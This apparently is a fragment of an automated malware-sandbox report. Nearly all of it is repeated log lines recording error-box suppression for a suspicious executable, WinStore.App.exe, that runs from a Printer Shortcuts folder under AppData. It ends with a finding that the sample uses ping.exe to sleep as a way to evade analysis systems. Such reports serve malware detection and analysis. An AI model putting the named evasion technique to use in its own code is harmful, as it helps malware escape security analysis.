Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

